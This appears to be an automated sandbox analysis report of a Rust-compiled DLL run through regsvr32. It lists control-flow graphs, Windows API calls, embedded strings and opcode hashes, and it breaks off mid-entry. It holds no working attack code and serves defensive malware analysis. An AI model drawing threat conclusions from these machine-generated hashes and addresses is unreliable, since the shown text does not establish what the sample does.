                                                                              • String ID: program path has no file name$#$*+-./:?@\_cmd.exe /e:ON /v:OFF /d /c "$.exeprogram not found$PATHstd\src\sys_common\process.rs$\?\\$\cmd.exemaximum number of ProcThreadAttributes exceeded$]?\\$assertion failed: is_code_point_boundary(self, new_len)$assertion failed: self.height > 0$exe\\.\NULexit code:
                                                                              • API String ID: 3975177916-1077193248
                                                                              • Opcode ID: 5f271afe2ae9fccf6b5da3c282bb1f0fd7e512b2bed9e239f16a325d63dc81ec
                                                                              • Instruction ID: c0d9193c338d548185e6e9524ad3a75a5092939457380aa21ebe2440b55b40d9
                                                                              • Opcode Fuzzy Hash: 5f271afe2ae9fccf6b5da3c282bb1f0fd7e512b2bed9e239f16a325d63dc81ec
                                                                              • Instruction Fuzzy Hash: BD739362B19AD184EB74CF25D8A43FA2361FB46789F44413ACF4D9BB89DF3C9641A310
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 00000009.00000002.1165802210.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1165995133.00007FFD34995000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166025328.00007FFD34996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166165595.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166193995.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166222345.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166251588.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: CreateHeapmemcpy$AllocAttributesErrorFileLastMutex
                                                                              • String ID: $/i:S$SYNC$a Display implementation returned an error unexpectedly/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\alloc\src\string.rs
                                                                              • API String ID: 622075969-830671369
                                                                              • Opcode ID: 628fb525d60ea1f3f78cdf2688f5850ff5ec56705c0d7a82da2c21062ca54488
                                                                              • Instruction ID: 5569a01c6f991157a02261c07891e845f63c2a2d5909f9eedb4a0aa5fd731e4e
                                                                              • Opcode Fuzzy Hash: 628fb525d60ea1f3f78cdf2688f5850ff5ec56705c0d7a82da2c21062ca54488
                                                                              • Instruction Fuzzy Hash: B1F26172B0CAC280EA759B11E4907EBA361FB86780F444136DB8C87B9ADF7DD584DB50
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 00000009.00000002.1165802210.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1165995133.00007FFD34995000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166025328.00007FFD34996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166165595.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166193995.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166222345.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166251588.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: CloseHandle$memcpymemset
                                                                              • String ID: :$called `Result::unwrap()` on an `Err` value
                                                                              • API String ID: 3399779480-2450422549
                                                                              • Opcode ID: ea0be7390e286caaa00e7880bc695e4b23e31b11e248fb54786aec96b10c7e47
                                                                              • Instruction ID: 996ba971ebd50a4943896cf99c184efdef6f08b63242ad6eb29740ee3b7d0798
                                                                              • Opcode Fuzzy Hash: ea0be7390e286caaa00e7880bc695e4b23e31b11e248fb54786aec96b10c7e47
                                                                              • Instruction Fuzzy Hash: 28234122A0DBC691FA758B14F4947EAB360FB96344F449229DBCC42699DF7CE2C4DB40

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 2084 7ffd3493eff0-7ffd3493f058 call 7ffd34992a94 2087 7ffd3493f060-7ffd3493f072 GetCurrentProcessId 2084->2087 2088 7ffd3493f074 2087->2088 2089 7ffd3493f0a8-7ffd3493f127 call 7ffd34970bf0 2087->2089 2090 7ffd3493f080-7ffd3493f0a6 ProcessPrng 2088->2090 2093 7ffd3493f13e-7ffd3493f168 2089->2093 2094 7ffd3493f129-7ffd3493f139 call 7ffd348efe90 2089->2094 2090->2089 2090->2090 2096 7ffd3493f180-7ffd3493f19b 2093->2096 2097 7ffd3493f16a-7ffd3493f170 2093->2097 2094->2093 2100 7ffd3493f255-7ffd3493f275 call 7ffd348efe80 2096->2100 2098 7ffd3493f1a0-7ffd3493f1b1 2097->2098 2099 7ffd3493f172-7ffd3493f179 2097->2099 2103 7ffd3493f1b3-7ffd3493f1c2 2098->2103 2104 7ffd3493f1f2-7ffd3493f1fa 2098->2104 2102 7ffd3493f1fd-7ffd3493f202 2099->2102 2112 7ffd3493f6c7-7ffd3493f6cf call 7ffd3496f690 2100->2112 2113 7ffd3493f27b-7ffd3493f295 2100->2113 2105 7ffd3493f204-7ffd3493f244 2102->2105 2107 7ffd3493f1c8-7ffd3493f1eb 2103->2107 2108 7ffd3493f516-7ffd3493f528 2103->2108 2104->2102 2110 7ffd3493f6c4 2105->2110 2111 7ffd3493f24a-7ffd3493f251 2105->2111 2107->2102 2109 7ffd3493f1ed 2107->2109 2108->2102 2114 7ffd3493f52e-7ffd3493f557 2108->2114 2109->2114 2110->2112 2111->2100 2117 7ffd3493f6d4-7ffd3493f6dd 2112->2117 2116 7ffd3493f2b0-7ffd3493f2b3 2113->2116 2114->2105 2118 7ffd3493f310-7ffd3493f315 2116->2118 2119 7ffd3493f2b5-7ffd3493f2b8 2116->2119 2122 7ffd3493f6df 2117->2122 2123 7ffd3493f702-7ffd3493f712 2117->2123 2120 7ffd3493f470-7ffd3493f4b0 call 7ffd34992a24 2118->2120 2121 7ffd3493f31b-7ffd3493f32e 2118->2121 2124 7ffd3493f2f0-7ffd3493f2f4 2119->2124 2125 7ffd3493f2ba-7ffd3493f2bc 2119->2125 2151 7ffd3493f5d0-7ffd3493f5d3 2120->2151 2152 7ffd3493f4b6-7ffd3493f4c1 GetLastError 2120->2152 2127 7ffd3493f3a0-7ffd3493f3a5 2121->2127 2128 7ffd3493f330-7ffd3493f337 2121->2128 2129 7ffd3493f72c-7ffd3493f78f call 7ffd34993140 ReadFileEx 2122->2129 2130 7ffd3493f71f-7ffd3493f722 2123->2130 2131 7ffd3493f714-7ffd3493f71a call 7ffd348efe90 2123->2131 2124->2118 2126 7ffd3493f2f6-7ffd3493f2fd 2124->2126 2133 7ffd3493f2be-7ffd3493f2c1 2125->2133 2134 7ffd3493f303-7ffd3493f30a 2126->2134 2135 7ffd3493f3da-7ffd3493f3ea 2126->2135 2139 7ffd3493f2a5-7ffd3493f2ad 2127->2139 2136 7ffd3493f33d-7ffd3493f353 2128->2136 2137 7ffd3493f6a4 2128->2137 2155 7ffd3493f7d2-7ffd3493f7e1 GetLastError 2129->2155 2156 7ffd3493f791 2129->2156 2130->2129 2140 7ffd3493f724-7ffd3493f727 CloseHandle 2130->2140 2131->2130 2143 7ffd3493f2a0-7ffd3493f2a3 2133->2143 2144 7ffd3493f2c3-7ffd3493f2ee 2133->2144 2134->2133 2147 7ffd3493f427-7ffd3493f430 2135->2147 2148 7ffd3493f3ec-7ffd3493f3fc 2135->2148 2149 7ffd3493f355 2136->2149 2150 7ffd3493f35b-7ffd3493f35e 2136->2150 2145 7ffd3493f6b9-7ffd3493f6c2 call 7ffd3496f690 2137->2145 2139->2116 2140->2129 2143->2139 2144->2128 2145->2117 2159 7ffd3493f437-7ffd3493f446 2147->2159 2158 7ffd3493f3fe-7ffd3493f41e 2148->2158 2148->2159 2149->2150 2150->2137 2162 7ffd3493f364-7ffd3493f379 2150->2162 2160 7ffd3493f5d5-7ffd3493f5e4 call 7ffd348efe90 2151->2160 2161 7ffd3493f5e9-7ffd3493f642 call 7ffd34939060 2151->2161 2153 7ffd3493f4c7-7ffd3493f4ca 2152->2153 2154 7ffd3493f55c-7ffd3493f576 2152->2154 2163 7ffd3493f4e0-7ffd3493f4e3 2153->2163 2164 7ffd3493f4cc-7ffd3493f4d2 2153->2164 2173 7ffd3493f578-7ffd3493f587 call 7ffd348efe90 2154->2173 2174 7ffd3493f58c-7ffd3493f593 2154->2174 2170 7ffd3493f7e4-7ffd3493f7f0 2155->2170 2165 7ffd3493f7a0-7ffd3493f7b3 SleepEx 2156->2165 2167 7ffd3493f420 2158->2167 2168 7ffd3493f448-7ffd3493f465 2158->2168 2159->2167 2159->2168 2160->2161 2180 7ffd3493f647-7ffd3493f64a 2161->2180 2162->2145 2172 7ffd3493f37f-7ffd3493f38f 2162->2172 2163->2154 2176 7ffd3493f4e5-7ffd3493f4eb 2163->2176 2175 7ffd3493f4ed-7ffd3493f4f7 2164->2175 2165->2165 2177 7ffd3493f7b5-7ffd3493f7cc 2165->2177 2167->2147 2168->2120 2178 7ffd3493f804-7ffd3493f810 2170->2178 2179 7ffd3493f7f2-7ffd3493f802 call 7ffd34947000 2170->2179 2181 7ffd3493f391-7ffd3493f39e 2172->2181 2182 7ffd3493f3aa 2172->2182 2173->2174 2184 7ffd3493f5a7-7ffd3493f5ab 2174->2184 2185 7ffd3493f595-7ffd3493f5a2 call 7ffd348efe90 2174->2185 2175->2087 2186 7ffd3493f4fd-7ffd3493f511 call 7ffd348efe90 2175->2186 2176->2154 2176->2175 2177->2170 2191 7ffd3493f7ce-7ffd3493f7d0 2177->2191 2195 7ffd3493f814-7ffd3493f820 2178->2195 2179->2195 2193 7ffd3493f66d-7ffd3493f687 2180->2193 2194 7ffd3493f64c-7ffd3493f662 2180->2194 2187 7ffd3493f3ac-7ffd3493f3c5 call 7ffd3490c530 2181->2187 2182->2187 2189 7ffd3493f5ad-7ffd3493f5b0 CloseHandle 2184->2189 2190 7ffd3493f5b5-7ffd3493f5cf 2184->2190 2185->2184 2186->2087 2204 7ffd3493f6a6-7ffd3493f6b5 2187->2204 2205 7ffd3493f3cb-7ffd3493f3d5 2187->2205 2189->2190 2191->2195 2193->2190 2199 7ffd3493f68d-7ffd3493f69f call 7ffd348efe90 2193->2199 2194->2185 2198 7ffd3493f668 2194->2198 2198->2184 2199->2190 2204->2145 2205->2139
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 00000009.00000002.1165802210.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1165995133.00007FFD34995000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166025328.00007FFD34996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166165595.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166193995.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166222345.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166251588.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Process$CurrentPrng
                                                                              • String ID:
                                                                              • API String ID: 716580790-0
                                                                              • Opcode ID: 40dc5403d3e7f1c73b41867c1b58de82fda09004a7655f2a900109c1b82822c2
                                                                              • Instruction ID: bc6ec330fc3fb8291bb3f9e4169a6a44435c3c40e9b44282cc182def78a86829
                                                                              • Opcode Fuzzy Hash: 40dc5403d3e7f1c73b41867c1b58de82fda09004a7655f2a900109c1b82822c2
                                                                              • Instruction Fuzzy Hash: FF220422B04A828AEB648F25D8B03B92790FB46798F144239EF5E877DDDF3CD541A310

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 4539 7ffd348fa1b0-7ffd348fa1bd 4540 7ffd348fa216 4539->4540 4541 7ffd348fa1bf-7ffd348fa1cb 4539->4541 4543 7ffd348fa218-7ffd348fa224 4540->4543 4542 7ffd348fa1d8-7ffd348fa1fc BCryptGenRandom 4541->4542 4544 7ffd348fa1d0-7ffd348fa1d6 4542->4544 4545 7ffd348fa1fe-7ffd348fa20c SystemFunction036 4542->4545 4544->4540 4544->4542 4545->4544 4546 7ffd348fa20e-7ffd348fa214 4545->4546 4546->4543
                                                                              APIs
                                                                              • BCryptGenRandom.BCRYPT(?,?,?,00007FFD348F9CF5,?,?,?,00007FFD348E75E3), ref: 00007FFD348FA1F2
                                                                              • SystemFunction036.ADVAPI32(?,?,?,00007FFD348F9CF5,?,?,?,00007FFD348E75E3), ref: 00007FFD348FA205
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 00000009.00000002.1165802210.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1165995133.00007FFD34995000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166025328.00007FFD34996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166165595.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166193995.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166222345.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166251588.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: CryptFunction036RandomSystem
                                                                              • String ID:
                                                                              • API String ID: 1232939966-0
                                                                              • Opcode ID: c031059723b10d59420d2a20c74ec451050b05ffebddda9da0033cc7770c6797
                                                                              • Instruction ID: 65d8aa66f8bd1c53f04c58e3a01a8d9f1d7b70b0aff3ba751c94dcb5592bb17f
                                                                              • Opcode Fuzzy Hash: c031059723b10d59420d2a20c74ec451050b05ffebddda9da0033cc7770c6797
                                                                              • Instruction Fuzzy Hash: 52F09053F0915905FE7516A63E945B580415F2ABF0D288335AE3AD7AD5AC2C6C863100

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 2010 7ffd34931830-7ffd3493187b call 7ffd34940940 2013 7ffd34931a3f-7ffd34931a46 2010->2013 2014 7ffd34931881-7ffd349318b0 2010->2014 2017 7ffd34931a67-7ffd34931a7d 2013->2017 2015 7ffd349318b2 CloseHandle 2014->2015 2016 7ffd349318b7-7ffd34931907 2014->2016 2015->2016 2018 7ffd34931956-7ffd34931958 2016->2018 2019 7ffd34931909-7ffd3493190b 2016->2019 2020 7ffd34931999-7ffd349319a8 WaitForSingleObject 2018->2020 2021 7ffd3493195a-7ffd3493196d call 7ffd3493c570 2018->2021 2022 7ffd3493190d-7ffd3493191b call 7ffd3493f930 2019->2022 2023 7ffd34931978-7ffd3493198b call 7ffd3493c570 2019->2023 2026 7ffd349319ef-7ffd349319fd call 7ffd34992b0c 2020->2026 2027 7ffd349319aa-7ffd349319b9 GetLastError 2020->2027 2039 7ffd34931a7e-7ffd34931aaa call 7ffd3497c8b0 2021->2039 2040 7ffd34931973-7ffd34931976 2021->2040 2031 7ffd34931920-7ffd34931923 2022->2031 2042 7ffd34931991 2023->2042 2043 7ffd34931aac-7ffd34931ad3 call 7ffd3497c8b0 2023->2043 2041 7ffd34931a02-7ffd34931a04 2026->2041 2029 7ffd349319bb-7ffd349319c5 call 7ffd348efe90 2027->2029 2030 7ffd349319ca-7ffd349319d5 2027->2030 2029->2030 2037 7ffd349319d7-7ffd349319e1 call 7ffd348efe90 2030->2037 2038 7ffd349319e6-7ffd349319ed 2030->2038 2031->2020 2036 7ffd34931925-7ffd34931951 call 7ffd3497c8b0 2031->2036 2053 7ffd34931ad8-7ffd34931b3a call 7ffd348fd2f0 CloseHandle 2036->2053 2037->2038 2048 7ffd34931a26-7ffd34931a3a CloseHandle * 2 2038->2048 2039->2053 2049 7ffd34931994 CloseHandle 2040->2049 2041->2027 2050 7ffd34931a06-7ffd34931a22 2041->2050 2042->2049 2043->2053 2054 7ffd34931a48-7ffd34931a63 2048->2054 2055 7ffd34931a3c 2048->2055 2049->2020 2050->2048 2060 7ffd34931b4b-7ffd34931b52 2053->2060 2061 7ffd34931b3c-7ffd34931b46 call 7ffd348efe90 2053->2061 2054->2017 2055->2013 2063 7ffd34931b63-7ffd34931bcb call 7ffd348fdb90 CloseHandle * 2 call 7ffd34993140 call 7ffd34940940 2060->2063 2064 7ffd34931b54-7ffd34931b5e call 7ffd348efe90 2060->2064 2061->2060 2072 7ffd34931bcd-7ffd34931bd7 2063->2072 2073 7ffd34931bdc-7ffd34931bf3 2063->2073 2064->2063 2074 7ffd34931c74-7ffd34931c87 2072->2074 2075 7ffd34931bfe-7ffd34931c0d WaitForSingleObject 2073->2075 2076 7ffd34931bf5-7ffd34931bf9 CloseHandle 2073->2076 2077 7ffd34931c0f-7ffd34931c25 GetLastError 2075->2077 2078 7ffd34931c27-7ffd34931c3c GetExitCodeProcess 2075->2078 2076->2075 2079 7ffd34931c46-7ffd34931c5c CloseHandle * 2 2077->2079 2078->2077 2080 7ffd34931c3e-7ffd34931c44 2078->2080 2081 7ffd34931c5e-7ffd34931c61 CloseHandle 2079->2081 2082 7ffd34931c66-7ffd34931c6a 2079->2082 2080->2079 2081->2082 2082->2074 2083 7ffd34931c6c-7ffd34931c6f CloseHandle 2082->2083 2083->2074
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 00000009.00000002.1165802210.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1165995133.00007FFD34995000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166025328.00007FFD34996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166165595.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166193995.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166222345.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166251588.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: CloseHandle$ErrorLastObjectSingleWait
                                                                              • String ID: called `Result::unwrap()` on an `Err` value
                                                                              • API String ID: 1454876536-2333694755
                                                                              • Opcode ID: 660baef9c8bf454d89af356a35f9762fb17fecd442998839c101f79af35d2176
                                                                              • Instruction ID: 2e4d6c4817b15af8830d5f1de1e795a5b4c0d8c7cf03ad6cdc4c69cbee933845
                                                                              • Opcode Fuzzy Hash: 660baef9c8bf454d89af356a35f9762fb17fecd442998839c101f79af35d2176
                                                                              • Instruction Fuzzy Hash: C3C16D32B08A4289EB109F61E8A13FD2760BB46798F144439EF4D96B9DDF3CE585E350

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 2207 7ffd3493f930-7ffd3493f968 call 7ffd3493fbd0 2210 7ffd3493f977-7ffd3493f9aa call 7ffd3493fbd0 2207->2210 2211 7ffd3493f96a-7ffd3493f972 CloseHandle 2207->2211 2215 7ffd3493f9b0-7ffd3493f9e8 2210->2215 2216 7ffd3493fb71-7ffd3493fb75 call 7ffd348fdac0 2210->2216 2212 7ffd3493fb7a-7ffd3493fb8c 2211->2212 2217 7ffd3493f9f0-7ffd3493fa09 call 7ffd34992d24 2215->2217 2216->2212 2221 7ffd3493fa50-7ffd3493fa57 2217->2221 2222 7ffd3493fa0b-7ffd3493fa0d 2217->2222 2225 7ffd3493fa5d-7ffd3493fa60 2221->2225 2226 7ffd3493fb25-7ffd3493fb2b call 7ffd3493fcb0 2221->2226 2223 7ffd3493fa13-7ffd3493fa1a 2222->2223 2224 7ffd3493fb58-7ffd3493fb5d GetLastError 2222->2224 2228 7ffd3493fa20-7ffd3493fa23 2223->2228 2229 7ffd3493faae-7ffd3493fab4 call 7ffd3493fcb0 2223->2229 2230 7ffd3493fb60-7ffd3493fb64 2224->2230 2231 7ffd3493fa62-7ffd3493fa66 2225->2231 2232 7ffd3493fa6b-7ffd3493fa8a GetOverlappedResult 2225->2232 2233 7ffd3493fb30-7ffd3493fb34 2226->2233 2235 7ffd3493fa91 2228->2235 2236 7ffd3493fa25-7ffd3493fa44 GetOverlappedResult 2228->2236 2244 7ffd3493fab9-7ffd3493fabd 2229->2244 2237 7ffd3493fb68-7ffd3493fb6c call 7ffd348fdac0 2230->2237 2238 7ffd3493fb10-7ffd3493fb23 2231->2238 2239 7ffd3493fa8c-7ffd3493fa8f 2232->2239 2240 7ffd3493fae9-7ffd3493faf1 GetLastError 2232->2240 2242 7ffd3493fb42-7ffd3493fb46 2233->2242 2243 7ffd3493fb36-7ffd3493fb3a 2233->2243 2241 7ffd3493fa95-7ffd3493faa8 2235->2241 2245 7ffd3493facf-7ffd3493fad7 GetLastError 2236->2245 2246 7ffd3493fa4a-7ffd3493fa4d 2236->2246 2237->2216 2238->2226 2250 7ffd3493fb4b-7ffd3493fb56 call 7ffd3493fdc0 2238->2250 2239->2238 2247 7ffd3493faf3-7ffd3493faff 2240->2247 2248 7ffd3493fb07-7ffd3493fb09 2240->2248 2241->2229 2251 7ffd3493fb48 2241->2251 2242->2237 2243->2217 2252 7ffd3493fb40 2243->2252 2244->2242 2253 7ffd3493fac3-7ffd3493fac7 2244->2253 2254 7ffd3493fb03-7ffd3493fb05 2245->2254 2255 7ffd3493fad9-7ffd3493fae5 2245->2255 2246->2241 2247->2238 2257 7ffd3493fb01 2247->2257 2248->2238 2250->2237 2251->2250 2252->2250 2253->2217 2258 7ffd3493facd 2253->2258 2254->2241 2255->2241 2259 7ffd3493fae7 2255->2259 2257->2230 2258->2251 2259->2230
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 00000009.00000002.1165802210.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1165995133.00007FFD34995000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166025328.00007FFD34996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166165595.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166193995.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166222345.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166251588.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCreateEventHandleOverlappedResult
                                                                              • String ID:
                                                                              • API String ID: 3756958029-0
                                                                              • Opcode ID: 84a7fc5001b71218857a51a8f00ab7653fb51d5c37684a85e2f4fab1a857e566
                                                                              • Instruction ID: 09629becd0e96d21367f7999c8281521745ef32a758ae7708f8b54a391080136
                                                                              • Opcode Fuzzy Hash: 84a7fc5001b71218857a51a8f00ab7653fb51d5c37684a85e2f4fab1a857e566
                                                                              • Instruction Fuzzy Hash: 4C619162F08A4689FB508A6584B13BC2BB0AB17798F144439DF0DD7B9DDF2CE585A360

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 2261 7ffd34939060-7ffd34939097 call 7ffd349471c0 2264 7ffd349390a3-7ffd349390dd call 7ffd349497b0 2261->2264 2265 7ffd34939099-7ffd3493909e 2261->2265 2269 7ffd349390df-7ffd349390e2 2264->2269 2270 7ffd349390e7-7ffd349390f1 2264->2270 2266 7ffd3493927b-7ffd3493928a 2265->2266 2269->2266 2271 7ffd349390f3-7ffd349390f5 2270->2271 2272 7ffd349390f9-7ffd349390fb 2270->2272 2273 7ffd349390fd-7ffd34939101 2271->2273 2275 7ffd349390f7 2271->2275 2272->2273 2274 7ffd34939158-7ffd3493915c 2272->2274 2276 7ffd3493910d-7ffd34939116 2273->2276 2277 7ffd34939103-7ffd34939107 2273->2277 2278 7ffd3493924d-7ffd3493925a 2274->2278 2279 7ffd34939162-7ffd34939166 2274->2279 2275->2276 2281 7ffd3493912d-7ffd34939130 2276->2281 2282 7ffd34939118-7ffd34939121 2276->2282 2277->2276 2277->2278 2278->2266 2280 7ffd3493925c-7ffd34939276 call 7ffd348efe90 2278->2280 2279->2278 2283 7ffd3493916c-7ffd34939170 2279->2283 2280->2266 2286 7ffd34939132-7ffd3493913b 2281->2286 2287 7ffd34939177-7ffd34939187 2281->2287 2285 7ffd34939123-7ffd34939126 2282->2285 2282->2286 2283->2276 2288 7ffd34939172 2283->2288 2290 7ffd3493913d-7ffd34939141 2285->2290 2291 7ffd34939128-7ffd3493912b 2285->2291 2286->2290 2286->2291 2287->2291 2292 7ffd34939189 2287->2292 2288->2278 2294 7ffd34939143-7ffd34939156 2290->2294 2295 7ffd3493918b-7ffd3493918d 2290->2295 2293 7ffd349391a7-7ffd349391df CreateFileW 2291->2293 2292->2290 2298 7ffd349391e5-7ffd349391ec 2293->2298 2299 7ffd3493928b-7ffd349392a3 GetLastError 2293->2299 2294->2293 2296 7ffd3493918f-7ffd34939196 2295->2296 2297 7ffd3493919a-7ffd3493919c 2295->2297 2300 7ffd349391a2 2296->2300 2301 7ffd34939198 2296->2301 2297->2278 2297->2300 2304 7ffd349391ee-7ffd349391f2 2298->2304 2305 7ffd34939227-7ffd3493922c 2298->2305 2302 7ffd3493922e-7ffd34939245 call 7ffd348efe90 2299->2302 2303 7ffd349392a5 2299->2303 2300->2293 2301->2293 2306 7ffd34939248-7ffd3493924b 2302->2306 2303->2306 2304->2305 2307 7ffd349391f4-7ffd349391fe GetLastError 2304->2307 2305->2302 2305->2306 2306->2266 2307->2305 2309 7ffd34939200-7ffd34939221 SetFileInformationByHandle 2307->2309 2309->2305 2311 7ffd349392a7-7ffd349392c2 GetLastError call 7ffd349929dc 2309->2311 2314 7ffd349392c4-7ffd349392d3 call 7ffd348efe90 2311->2314 2315 7ffd349392d8-7ffd349392e0 2311->2315 2314->2315 2315->2266
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 00000009.00000002.1165802210.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1165995133.00007FFD34995000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166025328.00007FFD34996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166165595.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166193995.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166222345.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1166251588.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast
                                                                              • String ID:
                                                                              • API String ID: 1452528299-0
                                                                              • Opcode ID: e64884f427bebdb6745d6532d253e7e2c87e6a1ed95c8e7f63ce1c3bb79c8093
                                                                              • Instruction ID: a38cc0b7e886a8c085328dfd3a2f497690e8e3bb2f29b2d70d8a6c1808818c09
